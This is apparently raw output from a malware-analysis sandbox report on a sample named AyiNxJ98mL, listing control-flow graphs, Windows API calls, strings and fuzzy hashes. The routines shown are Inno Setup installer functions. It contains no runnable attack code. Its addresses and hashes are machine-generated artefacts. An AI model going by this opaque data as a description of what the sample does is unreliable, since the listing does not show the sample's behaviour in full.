                                                              control_flow_graph 406 46f300-46f332 407 46f334-46f33b 406->407 408 46f34f 406->408 409 46f346-46f34d 407->409 410 46f33d-46f344 407->410 411 46f356-46f38e call 403634 call 403738 call 42ded0 408->411 409->411 410->408 410->409 418 46f390-46f3a4 call 403738 call 42ded0 411->418 419 46f3a9-46f3d2 call 403738 call 42ddf4 411->419 418->419 427 46f3d4-46f3dd call 46efd0 419->427 428 46f3e2-46f40b call 46f0ec 419->428 427->428 432 46f41d-46f420 call 403400 428->432 433 46f40d-46f41b call 403494 428->433 437 46f425-46f470 call 46f0ec call 42c40c call 46f134 call 46f0ec 432->437 433->437 446 46f486-46f4a7 call 455588 call 46f0ec 437->446 447 46f472-46f485 call 46f15c 437->447 454 46f4fd-46f504 446->454 455 46f4a9-46f4fc call 46f0ec call 431414 call 46f0ec call 431414 call 46f0ec 446->455 447->446 456 46f506-46f543 call 431414 call 46f0ec call 431414 call 46f0ec 454->456 457 46f544-46f54b 454->457 455->454 456->457 461 46f58c-46f5b1 call 40b44c call 46f0ec 457->461 462 46f54d-46f58b call 46f0ec * 3 457->462 481 46f5b3-46f5be call 47bfd8 461->481 482 46f5c0-46f5c9 call 403494 461->482 462->461 491 46f5ce-46f5d9 call 478d20 481->491 482->491 496 46f5e2 491->496 497 46f5db-46f5e0 491->497 498 46f5e7-46f7b1 call 403778 call 46f0ec call 47bfd8 call 46f134 call 403494 call 40357c * 2 call 46f0ec call 403494 call 40357c * 2 call 46f0ec call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 496->498 497->498 561 46f7c7-46f7d5 call 46f15c 498->561 562 46f7b3-46f7c5 call 46f0ec 498->562 566 46f7da 561->566 567 46f7db-46f824 call 46f15c call 46f190 call 46f0ec call 47bfd8 call 46f1f4 562->567 566->567 578 46f826-46f849 call 46f15c * 2 567->578 579 46f84a-46f857 567->579 578->579 581 46f926-46f92d 579->581 582 46f85d-46f864 579->582 583 46f987-46f99d RegCloseKey 581->583 584 46f92f-46f965 call 4946bc 581->584 586 46f866-46f86d 582->586 587 46f8d1-46f8e0 582->587 584->583 586->587 591 46f86f-46f893 call 430bdc 586->591 590 46f8e3-46f8f0 587->590 594 46f907-46f920 call 430c18 call 46f15c 590->594 595 46f8f2-46f8ff 590->595 591->590 601 46f895-46f896 591->601 604 46f925 594->604 595->594 597 46f901-46f905 595->597 597->581 597->594 603 46f898-46f8be call 40b44c call 47954c 601->603 609 46f8c0-46f8c6 call 430bdc 603->609 610 46f8cb-46f8cd 603->610 604->581 609->610 610->603 612 46f8cf 610->612 612->590
                                                              APIs
                                                                • Part of subcall function 0046F0EC: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,004763FA,?,0049C1D0,?,0046F403,?,00000000,0046F99E,?,_is1), ref: 0046F10F
                                                                • Part of subcall function 0046F15C: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F7DA,?,?,00000000,0046F99E,?,_is1,?), ref: 0046F16F
                                                              • RegCloseKey.ADVAPI32(?,0046F9A5,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F9F0,?,?,0049C1D0,00000000), ref: 0046F998
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Value$Close
                                                              • String ID: " /SILENT$5.5.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                              • API String ID: 3391052094-1769338133
                                                              • Opcode ID: 67f6315d958a58f45cb4284f97db66795a1d98a02650a50bcbb58ac39832d899
                                                              • Instruction ID: 138fe2a8aa43a8f2517aa1aee13eacc10811dc4b0cf032f1bf39601b5d09dcc5
                                                              • Opcode Fuzzy Hash: 67f6315d958a58f45cb4284f97db66795a1d98a02650a50bcbb58ac39832d899
                                                              • Instruction Fuzzy Hash: 96126331A001089BCB04EB55F891ADE77F5FB49304F60807BE841AB396EB79BD49CB59

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1027 492208-49223c call 403684 1030 49223e-49224d call 446fac Sleep 1027->1030 1031 492252-49225f call 403684 1027->1031 1036 4926e2-4926fc call 403420 1030->1036 1037 49228e-49229b call 403684 1031->1037 1038 492261-492289 call 447008 call 403738 FindWindowA call 447288 1031->1038 1046 4922ca-4922d7 call 403684 1037->1046 1047 49229d-4922c0 call 447008 call 403738 FindWindowA call 447288 1037->1047 1038->1036 1055 4922d9-49231b call 446fac * 4 SendMessageA call 447288 1046->1055 1056 492320-49232d call 403684 1046->1056 1064 4922c5 1047->1064 1055->1036 1065 49237c-492389 call 403684 1056->1065 1066 49232f-492377 call 446fac * 4 PostMessageA call 4470e0 1056->1066 1064->1036 1074 4923d8-4923e5 call 403684 1065->1074 1075 49238b-4923d3 call 446fac * 4 SendNotifyMessageA call 4470e0 1065->1075 1066->1036 1087 492412-49241f call 403684 1074->1087 1088 4923e7-49240d call 447008 call 403738 RegisterClipboardFormatA call 447288 1074->1088 1075->1036 1102 492421-49245b call 446fac * 3 SendMessageA call 447288 1087->1102 1103 492460-49246d call 403684 1087->1103 1088->1036 1102->1036 1115 49246f-4924af call 446fac * 3 PostMessageA call 4470e0 1103->1115 1116 4924b4-4924c1 call 403684 1103->1116 1115->1036 1127 492508-492515 call 403684 1116->1127 1128 4924c3-492503 call 446fac * 3 SendNotifyMessageA call 4470e0 1116->1128 1140 49256a-492577 call 403684 1127->1140 1141 492517-492535 call 447008 call 42e3a4 1127->1141 1128->1036 1152 492579-4925a5 call 447008 call 403738 call 446fac GetProcAddress 1140->1152 1153 4925f1-4925fe call 403684 1140->1153 1159 492547-492555 GetLastError call 447288 1141->1159 1160 492537-492545 call 447288 1141->1160 1184 4925e1-4925ec call 4470e0 1152->1184 1185 4925a7-4925dc call 446fac * 2 call 447288 call 4470e0 1152->1185 1165 492600-492621 call 446fac FreeLibrary call 4470e0 1153->1165 1166 492626-492633 call 403684 1153->1166 1171 49255a-492565 call 447288 1159->1171 1160->1171 1165->1036 1180 492658-492665 call 403684 1166->1180 1181 492635-492653 call 447008 call 403738 CreateMutexA 1166->1181 1171->1036 1193 49269b-4926a8 call 403684 1180->1193 1194 492667-492699 call 48c638 call 403574 call 403738 OemToCharBuffA call 48c650 1180->1194 1181->1036 1184->1036 1185->1036 1203 4926aa-4926dc call 48c638 call 403574 call 403738 CharToOemBuffA call 48c650 1193->1203 1204 4926de 1193->1204 1194->1036 1203->1036 1204->1036
                                                              APIs
                                                              • Sleep.KERNEL32(00000000,00000000,004926FD,?,?,?,?,00000000,00000000,00000000), ref: 00492248
                                                              • FindWindowA.USER32(00000000,00000000), ref: 00492279
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: FindSleepWindow
                                                              • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                              • API String ID: 3078808852-3310373309
                                                              • Opcode ID: 04389725d469abda592edc5d686fc9dc2997d938da4e0f8a72bd6865d44b9f5f
                                                              • Instruction ID: d4b9d66e752ac066ee841e8e0b6dcdad2790022369f15f3c2d7e05b7c0e56f01
                                                              • Opcode Fuzzy Hash: 04389725d469abda592edc5d686fc9dc2997d938da4e0f8a72bd6865d44b9f5f
                                                              • Instruction Fuzzy Hash: 7BC18360B042003BDB14BE3E8D4651F599AAF98704B21DA3FB446EB78BDE7DDC0A4359

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1589 4834fc-483521 GetModuleHandleA GetProcAddress 1590 483588-48358d GetSystemInfo 1589->1590 1591 483523-483539 GetNativeSystemInfo GetProcAddress 1589->1591 1593 483592-48359b 1590->1593 1592 48353b-483546 GetCurrentProcess 1591->1592 1591->1593 1592->1593 1602 483548-48354c 1592->1602 1594 4835ab-4835b2 1593->1594 1595 48359d-4835a1 1593->1595 1598 4835cd-4835d2 1594->1598 1596 4835a3-4835a7 1595->1596 1597 4835b4-4835bb 1595->1597 1600 4835a9-4835c6 1596->1600 1601 4835bd-4835c4 1596->1601 1597->1598 1600->1598 1601->1598 1602->1593 1604 48354e-483555 call 452708 1602->1604 1604->1593 1607 483557-483564 GetProcAddress 1604->1607 1607->1593 1608 483566-48357d GetModuleHandleA GetProcAddress 1607->1608 1608->1593 1609 48357f-483586 1608->1609 1609->1593
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0048350D
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0048351A
                                                              • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483528
                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483530
                                                              • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 0048353C
                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 0048355D
                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483570
                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483576
                                                              • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0048358D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                              • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                              • API String ID: 2230631259-2623177817
                                                              • Opcode ID: 902794c9b05e674b3c8cbfb7d2ebb6c35b92e2ba612f62c852d4d82e66413226
                                                              • Instruction ID: aef9cc714e700b71c16e3c25fef244724f393c0ebf8792b51c17ae6c670cb8ad
                                                              • Opcode Fuzzy Hash: 902794c9b05e674b3c8cbfb7d2ebb6c35b92e2ba612f62c852d4d82e66413226
                                                              • Instruction Fuzzy Hash: 3C11B181104341B4DA22BB799C4AB7FA5C88B14F1EF084C3B6C41662C2DBBCCF45972E

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1615 4690f4-46912c call 47bfd8 1618 469132-469142 call 478d40 1615->1618 1619 46930e-469328 call 403420 1615->1619 1624 469147-46918c call 4078fc call 403738 call 42de2c 1618->1624 1630 469191-469193 1624->1630 1631 469304-469308 1630->1631 1632 469199-4691ae 1630->1632 1631->1619 1631->1624 1633 4691c3-4691ca 1632->1633 1634 4691b0-4691be call 42dd5c 1632->1634 1636 4691f7-4691fe 1633->1636 1637 4691cc-4691ee call 42dd5c call 42dd74 1633->1637 1634->1633 1639 469257-46925e 1636->1639 1640 469200-469225 call 42dd5c * 2 1636->1640 1637->1636 1655 4691f0 1637->1655 1642 4692a4-4692ab 1639->1642 1643 469260-469272 call 42dd5c 1639->1643 1659 469227-469230 call 431508 1640->1659 1660 469235-469247 call 42dd5c 1640->1660 1645 4692e6-4692fc RegCloseKey 1642->1645 1646 4692ad-4692e1 call 42dd5c * 3 1642->1646 1656 469274-46927d call 431508 1643->1656 1657 469282-469294 call 42dd5c 1643->1657 1646->1645 1655->1636 1656->1657 1657->1642 1668 469296-46929f call 431508 1657->1668 1659->1660 1660->1639 1672 469249-469252 call 431508 1660->1672 1668->1642 1672->1639
                                                              APIs
                                                                • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                              • RegCloseKey.ADVAPI32(?,0046930E,?,?,00000001,00000000,00000000,00469329,?,00000000,00000000,?), ref: 004692F7
                                                              Strings
                                                              • Inno Setup: Deselected Tasks, xrefs: 00469285
                                                              • Inno Setup: Selected Components, xrefs: 00469216
                                                              • Inno Setup: App Path, xrefs: 004691B6
                                                              • Inno Setup: User Info: Serial, xrefs: 004692D9
                                                              • Inno Setup: User Info: Organization, xrefs: 004692C6
                                                              • %s\%s_is1, xrefs: 00469171
                                                              • Inno Setup: Setup Type, xrefs: 00469206
                                                              • Inno Setup: Selected Tasks, xrefs: 00469263
                                                              • Inno Setup: Deselected Components, xrefs: 00469238
                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00469153
                                                              • Inno Setup: User Info: Name, xrefs: 004692B3
                                                              • Inno Setup: No Icons, xrefs: 004691DF
                                                              • Inno Setup: Icon Group, xrefs: 004691D2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                              • API String ID: 47109696-1093091907
                                                              • Opcode ID: 25db79955295e6fcdf5aa6e288321b734c42c3c57179da3fb439077398282def
                                                              • Instruction ID: 061cd232f3236ea8aa9d1be5d6e88d15b117e94232a8cb9589ebe07a9024ca8b
                                                              • Opcode Fuzzy Hash: 25db79955295e6fcdf5aa6e288321b734c42c3c57179da3fb439077398282def
                                                              • Instruction Fuzzy Hash: 2451A530A007049BCB11DB65D991BDEB7F9EF49304F5084BAE841A7391E778AE05CB59

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1944 47cb30-47cb86 call 42c40c call 4035c0 call 47c7a8 call 4525c4 1953 47cb92-47cba1 call 4525c4 1944->1953 1954 47cb88-47cb8d call 453330 1944->1954 1958 47cba3-47cba9 1953->1958 1959 47cbbb-47cbc1 1953->1959 1954->1953 1960 47cbcb-47cbd3 call 403494 1958->1960 1961 47cbab-47cbb1 1958->1961 1962 47cbc3-47cbc9 1959->1962 1963 47cbd8-47cc00 call 42e3a4 * 2 1959->1963 1960->1963 1961->1959 1965 47cbb3-47cbb9 1961->1965 1962->1960 1962->1963 1970 47cc27-47cc41 GetProcAddress 1963->1970 1971 47cc02-47cc22 call 4078fc call 453330 1963->1971 1965->1959 1965->1960 1973 47cc43-47cc48 call 453330 1970->1973 1974 47cc4d-47cc6a call 403400 * 2 1970->1974 1971->1970 1973->1974
                                                              APIs
                                                              • GetProcAddress.KERNEL32(6F950000,SHGetFolderPathA), ref: 0047CC32
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: -rI$Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                              • API String ID: 190572456-1821436788
                                                              • Opcode ID: 6ffe9b8d239fe87f34ca3bad4a2ef70314c6aab1a19caa776437c1588b9a665e
                                                              • Instruction ID: 6634b889f1a60bd4549a24dd6789ad2f54a0d6468ac2a8038bb9781f42ef23c6
                                                              • Opcode Fuzzy Hash: 6ffe9b8d239fe87f34ca3bad4a2ef70314c6aab1a19caa776437c1588b9a665e
                                                              • Instruction Fuzzy Hash: 8531E970A00109DFCF11EFA9D9D29EEB7B5EB44304B60847BE808E7241D738AE458B6D

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1982 406334-40634e GetModuleHandleA GetProcAddress 1983 406350 1982->1983 1984 406357-406364 GetProcAddress 1982->1984 1983->1984 1985 406366 1984->1985 1986 40636d-40637a GetProcAddress 1984->1986 1985->1986 1987 406380-406381 1986->1987 1988 40637c-40637e SetProcessDEPPolicy 1986->1988 1988->1987
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                              • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                              • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModulePolicyProcess
                                                              • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                              • API String ID: 3256987805-3653653586
                                                              • Opcode ID: 44a467ebc0bbd25a117d5635929f8822d44e7a6198a0967341d1dbca25e1581a
                                                              • Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
                                                              • Opcode Fuzzy Hash: 44a467ebc0bbd25a117d5635929f8822d44e7a6198a0967341d1dbca25e1581a
                                                              • Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2618 423884-42388e 2619 4239b7-4239bb 2618->2619 2620 423894-4238b6 call 41f3d4 GetClassInfoA 2618->2620 2623 4238e7-4238f0 GetSystemMetrics 2620->2623 2624 4238b8-4238cf RegisterClassA 2620->2624 2626 4238f2 2623->2626 2627 4238f5-4238ff GetSystemMetrics 2623->2627 2624->2623 2625 4238d1-4238e2 call 408cc4 call 40311c 2624->2625 2625->2623 2626->2627 2629 423901 2627->2629 2630 423904-423960 call 403738 call 406300 call 403400 call 42365c SetWindowLongA 2627->2630 2629->2630 2641 423962-423975 call 424188 SendMessageA 2630->2641 2642 42397a-4239a8 GetSystemMenu DeleteMenu * 2 2630->2642 2641->2642 2642->2619 2644 4239aa-4239b2 DeleteMenu 2642->2644 2644->2619
                                                              APIs
                                                                • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                              • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                              • RegisterClassA.USER32(00499630), ref: 004238C7
                                                              • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                              • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                              • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                              • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                              • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                              • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                              • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                              • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                              • String ID:
                                                              • API String ID: 183575631-0
                                                              • Opcode ID: f8f7b9d3de02a5f634ff8a39374b78efb95d56f414cac3a76e6abeb800e2fe0e
                                                              • Instruction ID: c8b20579a229f032ee7a03b4d787949f367ffe63dd75f0d430c9c3a529dbdbac
                                                              • Opcode Fuzzy Hash: f8f7b9d3de02a5f634ff8a39374b78efb95d56f414cac3a76e6abeb800e2fe0e
                                                              • Instruction Fuzzy Hash: 813172B17402006AEB10AF65AC82F6B36989B14308F10017BFA40AE2D3C6BDDD40876D

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2646 4674ec-467596 call 41462c call 41464c call 41462c call 41464c SHGetFileInfo 2655 4675cb-4675d6 call 478d20 2646->2655 2656 467598-46759f 2646->2656 2661 467627-46763a call 47cff4 2655->2661 2662 4675d8-46761d call 42c40c call 40357c call 403738 ExtractIconA call 46742c 2655->2662 2656->2655 2657 4675a1-4675c6 ExtractIconA call 46742c 2656->2657 2657->2655 2668 46763c-467646 call 47cff4 2661->2668 2669 46764b-46764f 2661->2669 2684 467622 2662->2684 2668->2669 2672 467651-467674 call 403738 SHGetFileInfo 2669->2672 2673 4676a9-4676dd call 403400 * 2 2669->2673 2672->2673 2680 467676-46767d 2672->2680 2680->2673 2683 46767f-4676a4 ExtractIconA call 46742c 2680->2683 2683->2673 2684->2673
                                                              APIs
                                                              • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046758F
                                                              • ExtractIconA.SHELL32(00400000,00000000,?), ref: 004675B5
                                                                • Part of subcall function 0046742C: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 004674C4
                                                                • Part of subcall function 0046742C: DestroyCursor.USER32(00000000), ref: 004674DA
                                                              • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 0046760C
                                                              • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 0046766D
                                                              • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467693
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                              • String ID: c:\directory$k H$shell32.dll
                                                              • API String ID: 3376378930-433663191
                                                              • Opcode ID: 29e72a9552dfdc2cbc6caa590d21046d5f8b548d470bab6826c497dca36ee432
                                                              • Instruction ID: 265839c963417482dd86c951db209f81288bb0a388fd09f062db7983cc26d63d
                                                              • Opcode Fuzzy Hash: 29e72a9552dfdc2cbc6caa590d21046d5f8b548d470bab6826c497dca36ee432
                                                              • Instruction Fuzzy Hash: B2516070604604AFDB10EF69CD89FDFB7E8EB48318F1081A6F9049B391D6399E81CA59

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
